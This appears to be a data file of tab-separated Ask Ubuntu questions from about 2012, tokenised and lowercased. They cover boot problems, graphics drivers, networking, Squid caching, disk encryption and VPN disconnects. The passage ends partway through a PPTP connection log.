144310	i have ubuntu alongside windows vista and i can not reboot windows vista	i can not get into windows vista ... . i was working in vista and then i restarted booted up ubuntu and when i finished in ubuntu i restarted this time in vista and all i get is the microsoft box with the vertical stripes running interminably . i ran sudo update-grub this is the result of that command : generating grub.cfg found linux image : /boot/vmlinuz-3.2.0-24-generic found initrd image : /boot/iniytd.img-3.2.0-24-generic found linux image : /boot/vmlinuz-3.0.0-19-generic found linitrd image : /boot/initrd.img-3.0.0-19-generic found windows recovery environment ( loader ) on /dev/sda1 skipping windows recovery environment ( loader ) on wubi system found windows vista ( loader ) on /dev/sda2 skipping windows vista ( loader ) on wubi system i do have a backup of my windows environment on an external hard drive and i can get to it through ubuntu but i am not sure if i can restore windows vista from ubuntu or even if i need to . thanks for any help .
144311	how to make a gtk.iconview react to single click instead of double click ?	i use a gtk.iconview widget in my app to select different types of elements . the way the iconview works is the following : do one click to select the item do an additional double-click to activate the item i 've always found it confusing that an additional double click is needed , when most button-like widgets in the desktop just require a single click . now i 've just had feedback from a couple of users that find it confusing ( someone thought it was a bug that clicking on the button `` did nothing '' ) , so i 've decided to look into how to change that behaviour . ideally , i 'd like the iconview to behave as follows : hover to select an item ( optional ) single-click activates the item now i have n't found anything obvious in the widget 's properties to make it behave like that . does anyone know how or if that could be achieved ?
144312	mpirun -np n , what if n is larger than my core number ?	say i have a 4-core workstation , what would linux ( ubuntu ) do if i execute mpirun -np 9 xxx q1 . will 9 run immediately together , or they will run 4 after 4 ? q2 . i suppose that using 9 is not good , because the remainder 1 , it will make the computer confused , ( i do n't know is it going to be confused at all , or the `` head '' of the computer will decide which core among the 4 cores will be used ? ) or it will be randomly picked . who decide which one core to call ? q3 . if i feel my cpu is not bad and my ram is okay and large enough , and my case is not very big . is it a good idea in order to fully use my cpu and ram , that i do mpirun -np 8 xxx , or even mpirun -np 12 xxx . q4 . who decides all of these effciency optimization , ubuntu , or linux , or motherboard or cpu ? your enlightenment would be really appreciated .
144316	after bios screen appears , the purple screen appears with a red circle and a white line through it , saying can not load ubuntu 2d	after the bios screen appears , the purple screen appears and says , `` can not load ubuntu2d '' log off . logging off is my only option . i am operating on a dell insoirion 11.10 ubuntu system . i deleted the gnome because i read in the forum it slowed down the computer and i wanted to watch movies . i deleted unity as well because i read terrible things about it and that it was not necessary for me . i realize my experimention in learning by adding and deleting things were not proper . i was just trying to learn and fix my sound . please help . thanks .
144318	does the software centre provide a drm/licensing scheme ?	does ubuntu 's software centre include a drm/licensing mechanism so that applications can only be installed and run by the people who purchase them ? i 'm thinking of something similar to apple 's where only a user with a particular appleid can use software they purchase through the app store . if there is nothing built in , are there any solutions available to developers to implement something similar in their applications ?
144321	how to get work konica minolta bizhub 423 printer working ?	i am trying many times to install the driver of konica minolta bizhub 423 on ubuntu but i have not succeeded to get a printout . although communication can be established , it does not print . there are uri setting of which i am not much familiar . does anybody has an idea or was able to get it run ?
144322	how to make a launcher that will first navigate to a folder and then execute a command that resides in normal /usr/bin/	okay this question is basically directed for using grive the linux client for google drive details on how to do it are here . the thing is that , evrytime i want the folder to sync , i have to navigate to the google drive folder and then execute the grive commnd . i want to make it simple..i want to make a launcher ( i know how to make a *.desktop file ) . but in a .desktop file you always give path to executable file ( generally .sh ) . here , there is no script in the grive folder.the app is as usual in /usr/bin/grive now how do i make the launcher to first navigate to the grive folder and then execut the grive command.. thanx : )
144325	how do i disable the long press super key from showing the shortcuts window ?	note this is the long press and not the one for the short press as mentioned here how do i disable the super key ? the super key has been a modifier long before unity came , and i have used it on compiz zoom feature . so holding super down and moving the mouse scroll would zoom in and out the screen . but now in 12.04 the shortcut list screen pops up and it is irritating . i have also tried changing the keys to control +super + mouse scroll and a similar thing happens . is there anyway to disable or change the long press super key for this , i have searched compiz unity plugin , the systems preferences - keyboard shortcuts settings and have n't been able to find this .
144329	squid : caching *.swf with variables	i 'd recently upgraded my ubuntu 11.10 x64 server to 12.04 . in this process squid was updated from 2.7 to 3.1 . squid 3.1 has many different options witch broke my setup . so i completely removed squid 2.7 and 3.1 and started from scratch . everything is now working as before except for 1 thing : caching of .swf files with ? /variables . squid 3 sees a ? as dynamic content and does not cache it . for example , squid 2.7 was caching the .swf file at http : //ninjakiwi.com/games/tower-defense/play/bloons-tower-defense-5.html and 3.1 is not . < object id= '' mov '' name= '' movn '' classid= '' clsid : d27cdb6e-ae6d-11cf-96b8-444553540000 '' width= '' 800 '' height= '' 620 '' > < param name= '' movie '' value= '' http : //www.ninjakiwifiles.com/games/gameswfs/btd5.swf ? v=160512-2 '' > < param name= '' allowscriptaccess '' value= '' always '' > < param name= '' bgcolor '' value= '' # 000000 '' > < param name= '' flashvars '' value= '' file=http : //www.ninjakiwifiles.com/games/gameswfs/btd5-dat.swf ? v=280512 '' > < p > get flash play ninja kiwi games. < /p > < /object > it is because of the `` ? v=160512-2 '' and `` ? v=280512 '' part . this line should be responsible for that : refresh_pattern -i ( /cgi-bin/|\ ? ) 0 0 % 0 but disabling it still does n't cache the .swf files . how do i configure squid 3.1 to cache those files ? my current config is : acl manager proto cache_object acl localhost src 127.0.0.1/32 : :1 acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 : :1 acl ssl_ports port 443 acl safe_ports port 80 # http acl safe_ports port 21 # ftp acl safe_ports port 443 # https acl safe_ports port 70 # gopher acl safe_ports port 210 # wais acl safe_ports port 1025-65535 # unregistered ports acl safe_ports port 280 # http-mgmt acl safe_ports port 488 # gss-http acl safe_ports port 591 # filemaker acl safe_ports port 777 # multiling http acl connect method connect acl localnet src 192.168.2.0-192.168.2.254 acl localnet src 192.168.3.0-192.168.3.254 http_access allow manager localhost http_access deny manager http_access deny ! safe_ports http_access deny connect ! ssl_ports http_access allow localhost http_access allow localnet http_access deny all http_port 3128 cache_dir ufs /var/spool/squid 10240 16 256 maximum_object_size 100 mb coredump_dir /var/spool/squid3 refresh_pattern ^ftp : 1440 20 % 10080 refresh_pattern ^gopher : 1440 0 % 1440 refresh_pattern -i \ . ( gif|png|jpg|jpeg|ico ) $ 10080 90 % 43200 override-expire ignore-no-cache ignore-no-store ignore-private refresh_pattern -i \ . ( iso|avi|wav|mp3|mp4|mpeg|swf|flv|x-flv ) $ 43200 90 % 432000 override-expire ignore-no-cache ignore-no-store ignore-private refresh_pattern -i \ . ( deb|rpm|exe|zip|tar|tgz|ram|rar|bin|ppt|doc|tiff ) $ 10080 90 % 43200 override-expire ignore-no-cache ignore-no-store ignore-private refresh_pattern -i \.index . ( html|htm ) $ 0 40 % 10080 refresh_pattern -i \ . ( html|htm|css|js ) $ 1440 40 % 40320 refresh_pattern packages\.bz2 $ 0 20 % 4320 refresh-ims refresh_pattern sources\.bz2 $ 0 20 % 4320 refresh-ims refresh_pattern release\.gpg $ 0 20 % 4320 refresh-ims refresh_pattern release $ 0 20 % 4320 refresh-ims refresh_pattern . 0 40 % 40320 cache_effective_user proxy cache_effective_group proxy
144330	how do i fix this half screen problem ?	i just installed 12.04 , and my entire screen is being displayed entirely on the top half of my screen . the bottom half is always black or some technical garbage from the boot up . to interact with the bottom half of the screen i have to move the mouse over the screen to pull part of the bottom half of the screen on top and vice-versa . does anyone know how to fix this ? also my computer told me , at startup , to go to here : http : //wireless.kernel.org/en/users/drivers/b43 # devicefirmware . i 'm on a dell mini inspiron1010 , it 's a fairly standard setup for a 1010 ( as far as i know ) . i do n't know what model the card graphics card is though .
144337	adobe flash not working in 12.04	i can not get adobe flash working in either firefox or chrome . i have tried the flash-aid plug in for firefox but it has not made any difference . as far as i can see , flash installs without error and firefox thinks it can run flash but ( for example ) youtube just shows a blank square where the movie should be me . chrome reports `` missing plugin '' . about : plugins in firefox reports : shockwave flash file : libflashplayer.so version : shockwave flash 11.2 r202 mime type description suffixes application/x-shockwave-flash shockwave flash swf application/futuresplash futuresplash player spl
144339	ca n't login to unity always login to unity 2d	i select ubuntu on login and it always loads unity 2d . i ran /usr/lib/nux/unity_support_test -p and got this error x error of failed request : badwindow ( invalid window parameter ) major opcode of failed request : 137 ( nv-glx ) minor opcode of failed request : 4 ( ) resource id in failed request : 0x21f serial number of failed request : 42 current serial number in output stream : 42 i 'm using 12.04 with all the latest updates . nvidia-installer -- version nvidia-installer : version 295.53 ( buildmeister @ swio-display-x86-rhel47-07.nvidia.com ) sat may 12 00:34:26 pdt 2012 the nvidia software installer for unix/linux . this program is used to install , upgrade and uninstall the nvidia accelerated graphics driver set for linux-x86_64 . copyright ( c ) 2003 - 2010 nvidia corporation .
144342	ubuntu 12.04 hp dv7 can not connect to wireless network after suspend	i 'm running ubuntu 12.04 on my hp dv7 laptop and every time i wake from suspend i am unable to connect to my wireless network . ubuntu tries to reconnect me to the network but after a period of time the window pops up asking for me to enter the network key . i enter the network key but it still wo n't connect . where should i start looking for what could cause this problem ? thank you very much here is some info from lshw -c network : *-network description : wireless interface product : centrino wireless-n + wimax 6150 vendor : intel corporation physical id : 0 bus info : pci @ 0000:07:00.0 logical name : wlan0 version : 67 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-24-generic firmware=41.28.5.1 build 33926 ip=10.0.1.39 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:51 memory : c4500000-c4501fff thank you very much
144347	ubuntu 32bit version installed using wubi , on drive e , same hard drive , error `` no root file system defined ''	first time giving this a shot , seems like fun and its free . so originally i installed ubuntu 64bit version on drive e , from windows xp using wubi . i read somewhere that i can use teh installer for the 32bit version as i was having a hard time installing from the cd/dvd i made , and it wont allow me to install on the partition ( drive e ) when installing from cd/dvd . so after installing onto this drive e , during the reboot , it gets into ubuntu , but has an error during the installation and i can not do anything from there on out . i checked the partition , and the files are there . if 64bit version worked fine , why would this issue arise on the 32bit , same drive , same partition , same method ? i really want to mess around with this , and set up this older machine with ubuntu only . amd athlon 64 3700 , 2.2 mghtz , 2gb of ram , 500gbhdd , ati vid card 1gb ram , gigabyte mobo . any help much appreciated . thanks
144352	how can i install openmp in ubuntu ?	im using ubuntu 12.04 lts . i do n't know if it makes a difference but cpu 's architecture is 64bit ( intel i3 ) .
144357	does ubuntu server have a trash ?	i 'm rather new to linux . i was wondering if stuff still goes into the `` trash '' etc while using a server version of ubuntu . i 'm been deleting stuff and i just want to make sure the stuff is not being put into the trash .
144358	how important is adapting ubuntu with pc parameters ?	i have a project in ubuntu and my topic is `` scripts execution in terminal using openmp '' . i couldnt install openmp because my version of ubuntu did not match with my pc parameters . and now i ca n't find a version of ubuntu that match with my dell inspiron , processor pentium ( r ) dual core cpu t4500 @ 2.30ghz 2.30ghz , os:32 bit etc ... although i dont know the steps of installing openmp ? ? ?
144359	location of files on home folder	there are many files and folders that are created by applications but they are not showing up on my home folder . also , searching for them in the dash does not bring them up either . can i bring them up through the terminal ? or are they locked somehow ?
144360	reset login keyring ?	after upgrading from the previous lts ( 10.04 ) to the current lts ( 12.04 ) i got a warning that said my user account password does match the keyring password . when i go into `` passwords and keys '' i can not reset `` passwords : login '' as i do n't know what thinks the current password is . can i reinitialize the `` passwords : login '' ?
144364	ssh : connect to host myremotehost.com port 22 : connection refused	so i am trying to get ssh working on my server . i can connect on my local network with the local ip address of the server perfectly fine . when i try to connect remotely ( through a domain name that i set-up for the server , which i know works ) i get this connection refused error : ssh : connect to host bahhudson.mine.nu port 22 : connection refused from the research i have done into the problem it looks like something is going wrong with my router . i have configured port-forwarding , but that 's the only think i can think is causing the `` connection refused '' error ... my router is a wrt120n and i have configured it for port-forwarding based on portforward.com , which seems somewhat outdated since some of those images are not exactly like what my router settings look like , but i have tried multiple ways for setting the portforwarding up , and i know that forwarding for port 80 works because my server has http access which is working ... also vpn access was getting blocked in what i believe to be a similar way , so the solution to the ssh port 22 being blocked might also be similar to that of the vpn being blocked as well . any ideas ? thanks !
144374	ubuntu 12.04 nvidia twinview tearing	i 'm running ubuntu 12.04 . today i just purchased a second monitor ( i have a dell u2711 and a 42-inch sony tv ) . i 'm running the 295.49 proprietary nvidia graphics driver , my graphics card is a geforce gtx 460 . i am not able to activate `` xinerama '' with `` separate x screens '' , not sure why . i am able to use twinview . this works , although it results in severe tearing on the sony tv . it 's as though `` sync to vblank '' is n't working ( i have this set in compiz and in the nvidia settings ) . if i disable the dell u2711 and only use the sony , everything works fine , zero tearing . is it the case that `` sync to vblank '' can only work on a single monitor in ubuntu 12.04 ? is there any way to get rid of the tearing on the second monitor in twinview mode ?
144377	manually activate network manager applet	the issue i 've is that when i connect via modem through gnome-ppp the network manager applet do n't detect a connection and do n't let me use the configured vpns via its interface . how can i manually activate the network manager applet ? what i need is to enable the network manager apple in order to use the `` vpn connection '' section of the gui . when i do n't have an ethernet cable connected and i connect through a modem the network manager applet does n't enables itself , it is like if do n't recognizes the ppp0 interface . my question is : there is a way to force the network manager gui indicator to make it `` alive '' / '' up '' / '' enabled '' in order to use the `` vpn connections '' section ? thanks in advance .
144378	ubuntu 12.04 is n't detecting my alcatel 3g modem	today i installed ubuntu 12.04 and ubuntu did n't detect 3g usb modem i tried with usb_modeswitch but nothing happened . i have alcatel one touch x200d and is n't showing mobile broadband option in the network manager indicator . here is pictures of output of lsusb and usb-devices command lsusb : usb-devices : i hope you will help me . i only have only internet so it will be hard to make upgrade because of this problem .
144379	ubuntu logo into unicode table	i was searching something into an unicode table . suddenly , i feel astonished cause i saw the ubuntu logo , at line f200 , column 00 . a very small one is also available at f0e0 , column 1f . is it because this table on this web page has been generated with a ubuntu system or something ? or can i find it on any os ? ? ? what can be the reason to put this logo into the special-characters of unicode set ?
144383	fresh install of 12.04 - migrating permissions ?	i 've got a dev box running 10.10 desktop , and i 'd like to start over with a fresh 12.04 install . i figure this would be cleaner than a series of upgrades through all the intermediate installs . it ca n't hurt to clean out the crud that i 've tinkered with along the way too . most if not all my materials are on an mdadm raid 1 pair mounted at /data . this includes a set of gitosis-served git repositories , which at at /data/git ; in order to do this , i moved the gitosis user 's home dir to /data/git . my plan is to do a clean install , re-assemble the raid , recreate the gitosis user etc . my main question is about permissions . what happens to the permissions for directories on the raid device ? i assume that they will end up tied to uids of users that do n't exist . do i just have to go back through chown-ing and chgrp-ing them to bring them back into line with what was there before ? or is there a clean way to map them back to new users of the same name ? as an aside , i 've rsynced a copy of / ( excluding /data ) to a backup dir on the raid device ( and most likely will to an external too ) . is that enough to ensure i 've got all my old config files etc in case i need to refer back to them ? any insight appreciated . thanks , hugh
144389	ubuntu 12.04 and 2560x1600 display	first let me give you has much information as possible . i own a dell e4310 and a monitor u3011 , i was using ubuntu 11.10 i believe and everything was working without to much problem . i just installed 12.04 64bit and ... i have no image anymore . when i boot from the live cd , it display and can reach the 2560x1600 native resolution . one the installation done , if i disable the laptop display to keep only the 30 '' display , i can only reach 1920x1200 . any resolution above will give me a black screen ( only deleting the monitors.xml ) will allow me to recover . i believe the graphic card in the laptop is an intel hd3000 thanks for your help !
144393	how to let maas ' cloud-init client select internal mirror ?	our maas lan ca n't access the internet and has a internal apt-mirror site 192.168.3.6 . i changed the mirror set of maas server 's snippets/maas_proxy file as follows : d-i mirror/country string manual d-i mirror/http/hostname string 192.168.3.6 d-i mirror/http/directory string /ubuntu d-i mirror/http/proxy string i deployed two maas node . dashboard show the two node 's state are ready . but node 's cloud-init client changed the apt 's sources.list like this : # # note , this file is written by cloud-init on first boot of an instance # # modifications made here will not survive a re-bundle . # # if you wish to make changes you can : # # a . ) add 'apt_preserve_sources_list : true ' to /etc/cloud/cloud.cfg # # or do the same in user-data ... deb http : //archive.ubuntu.com/ubuntu precise main deb-src http : //archive.ubuntu.com/ubuntu precise main ... directly use cobbler install node ( without maas ) , the node apt 's sources.list like : ... deb http : //192.168.3.6/ubuntu precise main deb-src http : //192.168.3.6/ubuntu precise main ... my question is : how to set user-data in maas ? so that i can set cloud-init 's mirror 's url to 192.168.3.6 or prevent cloud-init to change mirror 's url . maas node 's file /home/ubuntu/.ssh/authorized_keys is empty . is it caused by the mirror 's setup ?
144399	random freezing	for several months i 've been experiencing random freezing ( usually once or twice a day ) and have yet to find out what the problem is or how to fix it . the symptoms always are : mouse and keyboard do n't work screen freezes if there was sound playing , the last second of it is repeated over and over about 5 % of the time it will fix itself within a few minutes
144408	what is the file : c : \nppdf32log\debuglog.txt	hello everyone after i updated to 12.04 , a file named `` c : \nppdf32log\debuglog.txt '' occurs in my home directory , the content of the file is as the follow : npp_initialize : called npp_getvalue is called npp_setwindow : called for instance 920c0e28 window from browser - 77594625 npp_setwindow : called for instance 920c0e28 window from browser - 77594625 npp_setwindow : called for instance 920c0e28 window from browser - 77594625 npp_newstream : called for instance 920c0e28 , stream 913403b0 , url http : //www.xxxxxx.com/attachments/soft/cdgm % 20optical % 20glass % 20catalog.pdf , stream size 36177984 , seekable 1 npp_write : called for instance 920c0e28 , stream 913403b0 , offset = 0 , length = 16384 , streamlength = 36177984 trying for window attributes trying for query tree npp_write : called for instance 920c0e28 , stream 913403b0 , offset = 16384 , length = 16384 , streamlength = 36177984 trying for window attributes trying for query tree ... ... it seems this file is related to firefox , what 's exactly the problem ? many thanks for your help !
144416	my fresh installed ubuntu 12,4 wonâ´t start without live usb drive	i just installed a fresh copy of ubuntu 12,04 in my netbook , through a live usb drive . i used the whole hdd and erased an existent win 7 partition . it installed everything and then asked me to reboot . when i did that , after rebooting , it only appeared the writer marker on top of a black screen and only that . then , i plugged in again my usb drive and reboot . it loaded , but in the loading screen sent me ( once ) an error about the hard drive , that some file was missing ( sorry i coulnd't write down the exact message ) . after that , i tried to re install ubuntu using my usb drive , but it sends me inmediately to the login screen . how do i solve this ?
144419	grub menu does n't appear	i 'm using windows 7 and i installed ubuntu 12.04 along side with it by creating a new 60 gb partition . it installed perfectly and then i restart the pc . i ca n't see the grub menu that let me to choose the operating systems . my monitor shows unsupported input please help me .
144422	how to run a .run file as root ?	i downloaded a .run file for a nvidia driver , but when i run it in the terminal it tells me it must be run as root . i 'm a complete noob and i barely even know what root is . i think it 's somewhere around the equivalent of admin in windows . well , i got the file to run but it turns out that the driver will not recognize my card . i 've heard about other problems with nvidia cards not working right with 64 bit versions of 12.04 .
144433	how to install hadoop ?	i am trying to install hadoop in ubuntu 12.04 version . following the instructions from http : //michael-noll.com/tutorials/running-hadoop-on-ubuntu-linux-single-node-cluster/ , i installed java-6-openjdk from ubuntu software-center . i have set java_home in .bashrc . also set java_home in hadoop conf/env.sh . while formatting the namenode , i am getting the following error : usr/lib/jvm/java-6-openjdk/bin/java no such file or directory . thank you . but it 's a 64bit os .
144435	how to prevent wlan connection from dropping permanently on a fritz usb wlan n stick ?	i have a desktop with a fritz usb wlan n stick and tried ubuntu 12.04 . installation went fine and wlan is working . however , connection drops permanent . reconnecting manually fixes it but after a few minutes it drops again . it 's connected to a vodafone 802 box with wlan n fix set . it seems that it works when i switch off n mode . but i need to test . can someone confirm this issue or is there another solution ? i have another machine with 12.04 ( hp 625 laptop ) running where connection is stable .
144436	unable to boot ubuntu 12.04 lts due to timeout=-1	i use ubuntu 12.04 lts in my mac mini with os x lion . unfortunately i have set the timeout as -1 in the /boot/grub/grub.cfg file , and ubuntu displays a menu screen to select an os to boot ( ubuntu or mac ) during grub session . but another unfortunate thing , my keyboard does not work during the grub session . what can i do ?
144437	how do i verify a partition is encrypted ?	this article shows me how to see if ubuntu has encrypted swap . what i would like to know is how i can determine that swap ( or any other partition ) is truly encrypted . what i would like to see is that some disk utility tries to read the encrypted contents , showing me gibberish , but after inputting the correct passphrase , it shows me the files as expected . this would be difficult for swap since crypttab uses a random key , but i /should/ be able to see the gibberish that indicates that it is encrypted . edit : i 'm adding the output from testdisk . i do n't know what to look for here . disk /dev/sda - 500 gb / 465 gib - st3500413as disk /dev/mapper/cryptswap1 - 4008 mb / 3823 mib disk /dev/mapper/vg_doulos-home - 453 gb / 422 gib - st3500413as disk /dev/mapper/vg_doulos-root - 39 gb / 37 gib - st3500413as disk /dev/mapper/vg_doulos-tmp - 1996 mb / 1904 mib - st3500413as disk /dev/sr0 - 735 mb / 701 mib ( ro ) - hp dvd d dh16d6sh disk /dev/dm-0 - 39 gb / 37 gib - st3500413as disk /dev/dm-1 - 1996 mb / 1904 mib - st3500413as disk /dev/dm-2 - 453 gb / 422 gib - st3500413as disk /dev/dm-3 - 4008 mb / 3823 mib at this point , what should i select to check ? for example , i selected /dev/mapper/vg_doulos_home . then i get a screen that looks like this : please select the partition table type , press enter when done . [ intel ] intel/pc partition [ efi gpt ] efi gpt partition map ( mac i386 , some x86_64 ... ) [ humax ] humax partition table [ mac ] apple partition map > [ none ] non partitioned media [ sun ] sun solaris partition [ xbox ] xbox partition [ return ] return to disk selection i automatically select non partitioned media because that 's the default here . i list the files here : p ext4 0 885940223 885940224 directory / > drwxr-xr-x 0 0 4096 30-may-2012 11:33 . drwxr-xr-x 0 0 4096 30-may-2012 11:33 .. drwx -- -- -- 0 0 16384 30-may-2012 11:03 lost+found dr-x -- -- -- 1000 1000 4096 30-may-2012 11:33 averyc drwxr-xr-x 0 0 4096 30-may-2012 11:33 .ecryptfs i 'm still able to drill down into the averyc home directory where i find this directory layout , but i 'm unable to copy any of the files : p ext4 0 885940223 885940224 directory /averyc > dr-x -- -- -- 1000 1000 4096 30-may-2012 11:33 . drwxr-xr-x 0 0 4096 30-may-2012 11:33 .. lrwxrwxrwx 1000 1000 32 30-may-2012 11:33 .ecryptfs lrwxrwxrwx 1000 1000 31 30-may-2012 11:33 .private lrwxrwxrwx 1000 1000 52 30-may-2012 11:33 readme.txt lrwxrwxrwx 1000 1000 56 30-may-2012 11:33 access-your-private-data.desktop can someone explain what 's going on here ? how can i verify that this partition is really encrypted ?
144442	how do i encrypt my /tmp directory ?	after reading this question about how often tmp is cleared , it would be best for our setup if tmp is encrypted . how do i encrypt it ? my fstab looks like this : proc /proc proc nodev , noexec , nosuid 0 0 /dev/mapper/vg_doulos-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=205a1a54-7dfa-45a6-a7e3-4a7234b3a473 /boot ext4 defaults 0 2 /dev/mapper/vg_doulos-home /home ext4 defaults 0 2 /dev/mapper/vg_doulos-tmp /tmp ext4 defaults 0 2 # swap was on /dev/sda2 during installation # uuid=705e9f69-bf95-4d44-9119-c40076d10333 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 crypttab : # < target name > < source device > < key file > < options > cryptswap1 /dev/sda2 /dev/urandom swap , cipher=aes-cbc-essiv : sha256 is it sufficient to put something like this in crypttab ? crypttmp /dev/mapper/vg_doulos-tmp /dev/urandom and then this to replace the tmp file entry in fstab ? /dev/mapper/crypttmp /tmp ext4 defaults 0 2
144444	stability of the latest daily build iso image for the released version of ubuntu ?	i want install ubuntu from the daily builds from cdimage.ubuntu.com . does it have all the updated packages after the initial 12.04 release , so that i do n't need to update after installation ? how is its stability as compared to the official 12.04 release ?
144445	how can i make qbittorrent 's unity icon work ?	i just installed qbittorrent , and the unity icon automatically appeared in the launcher . so far so good . when i click on it , qbittorrent launches . however , there is no indication that the program is running , i.e . no little triangle to the left or right of the icon . when qbittorrent is behind a few windows , clicking on the unity launcher icon makes the launcher icon flash , but does n't focus qbittorrent . in other words , it does n't look like the unity icon is working . how can i fix this ?
144456	pptp connection disconnect	my pptp connection wont stay connected , it will disconnect in less than a minute here are some relevant log entries may 31 13:32:31 localhost networkmanager [ 931 ] : < info > starting vpn service 'pptp ' ... may 31 13:32:31 localhost networkmanager [ 931 ] : < info > vpn service 'pptp ' started ( org.freedesktop.networkmanager.pptp ) , pid 15216 may 31 13:32:31 localhost networkmanager [ 931 ] : < info > vpn service 'pptp ' appeared ; activating connections may 31 13:32:31 localhost networkmanager [ 931 ] : < info > vpn plugin state changed : init ( 1 ) may 31 13:32:31 localhost networkmanager [ 931 ] : < info > vpn plugin state changed : starting ( 3 ) may 31 13:32:31 localhost networkmanager [ 931 ] : < info > vpn connection 'dynalabs ' ( connect ) reply received . may 31 13:32:31 localhost pppd [ 15221 ] : plugin /usr/lib/pppd/2.4.5/nm-pptp-pppd-plugin.so loaded . may 31 13:32:31 localhost pppd [ 15221 ] : pppd 2.4.5 started by root , uid 0 may 31 13:32:31 localhost pptp [ 15224 ] : nm-pptp-service-15216 log [ main : pptp.c:314 ] : the synchronous pptp option is not activated may 31 13:32:31 localhost pppd [ 15221 ] : using interface ppp0 may 31 13:32:31 localhost pppd [ 15221 ] : connect : ppp0 < -- > /dev/pts/5 may 31 13:32:31 localhost networkmanager [ 931 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) may 31 13:32:31 localhost networkmanager [ 931 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . may 31 13:32:32 localhost pptp [ 15235 ] : nm-pptp-service-15216 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 1 'start-control-connection-request' may 31 13:32:32 localhost pptp [ 15235 ] : nm-pptp-service-15216 log [ ctrlp_disp : pptp_ctrl.c:739 ] : received start control connection reply may 31 13:32:32 localhost pptp [ 15235 ] : nm-pptp-service-15216 log [ ctrlp_disp : pptp_ctrl.c:773 ] : client connection established . may 31 13:32:33 localhost pptp [ 15235 ] : nm-pptp-service-15216 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 7 'outgoing-call-request' may 31 13:32:34 localhost pptp [ 15235 ] : nm-pptp-service-15216 log [ ctrlp_disp : pptp_ctrl.c:858 ] : received outgoing call reply . may 31 13:32:34 localhost pptp [ 15235 ] : nm-pptp-service-15216 log [ ctrlp_disp : pptp_ctrl.c:897 ] : outgoing call established ( call id 0 , peer 's call id 1536 ) . may 31 13:32:37 localhost pppd [ 15221 ] : chap authentication succeeded may 31 13:32:37 localhost kernel : [ 54007.078553 ] ppp mppe compression module registered may 31 13:32:40 localhost pppd [ 15221 ] : mppe 128-bit stateless compression enabled may 31 13:32:42 localhost pppd [ 15221 ] : local ip address 10.100.0.52 may 31 13:32:42 localhost pppd [ 15221 ] : remote ip address 10.100.0.1 may 31 13:32:42 localhost pppd [ 15221 ] : primary dns address 4.2.2.1 may 31 13:32:42 localhost pppd [ 15221 ] : secondary dns address 255.255.255.255 may 31 13:32:42 localhost networkmanager [ 931 ] : < info > vpn connection 'dynalabs ' ( ip config get ) reply received . may 31 13:32:42 localhost networkmanager [ 931 ] : < info > vpn gateway : 103.28.219.2 may 31 13:32:42 localhost networkmanager [ 931 ] : < info > tunnel device : ppp0 may 31 13:32:42 localhost networkmanager [ 931 ] : < info > internal ip4 address : 10.100.0.52 may 31 13:32:42 localhost networkmanager [ 931 ] : < info > internal ip4 prefix : 32 may 31 13:32:42 localhost networkmanager [ 931 ] : < info > internal ip4 point-to-point address : 10.100.0.1 may 31 13:32:42 localhost networkmanager [ 931 ] : < info > maximum segment size ( mss ) : 0 may 31 13:32:42 localhost networkmanager [ 931 ] : < info > forbid default route : no may 31 13:32:42 localhost networkmanager [ 931 ] : < info > internal ip4 dns : 4.2.2.1 may 31 13:32:42 localhost networkmanager [ 931 ] : < info > internal ip4 dns : 255.255.255.255 may 31 13:32:42 localhost networkmanager [ 931 ] : < info > dns domain : ' ( none ) ' may 31 13:32:43 localhost dnsmasq [ 2127 ] : exiting on receipt of sigterm may 31 13:32:43 localhost networkmanager [ 931 ] : < info > dns : starting dnsmasq ... may 31 13:32:43 localhost networkmanager [ 931 ] : < info > ( ppp0 ) : writing resolv.conf to /sbin/resolvconf may 31 13:32:43 localhost dnsmasq [ 15290 ] : error at line 2 of /var/run/nm-dns-dnsmasq.conf may 31 13:32:43 localhost dnsmasq [ 15290 ] : failed to start up may 31 13:32:43 localhost networkmanager [ 931 ] : < info > vpn connection 'dynalabs ' ( ip config get ) complete . may 31 13:32:43 localhost networkmanager [ 931 ] : < info > policy set 'dynalabs ' ( ppp0 ) as default for ipv4 routing and dns . may 31 13:32:43 localhost networkmanager [ 931 ] : < info > vpn plugin state changed : started ( 4 ) may 31 13:32:43 localhost networkmanager [ 931 ] : < warn > dnsmasq exited with error : configuration problem ( 1 ) may 31 13:32:43 localhost networkmanager [ 931 ] : < info > ( ppp0 ) : writing resolv.conf to /sbin/resolvconf may 31 13:32:43 localhost dbus [ 872 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) may 31 13:32:43 localhost dbus [ 872 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' may 31 13:33:00 localhost ntpdate [ 15370 ] : step time server 91.189.94.4 offset -1.110301 sec may 31 13:33:21 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xd6d6 may 31 13:33:21 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x93aa may 31 13:33:21 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xcc83 may 31 13:33:21 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x2031 may 31 13:33:21 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x13d4 may 31 13:33:22 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x5b11 may 31 13:33:22 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x414b may 31 13:33:22 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x2f5f may 31 13:33:22 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xe9ff may 31 13:33:23 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x8e20 may 31 13:33:23 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x8f0 may 31 13:33:23 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0xf166 may 31 13:33:23 localhost pppd [ 15221 ] : protocol-reject for unsupported protocol 0x36e6 may 31 13:33:23 localhost 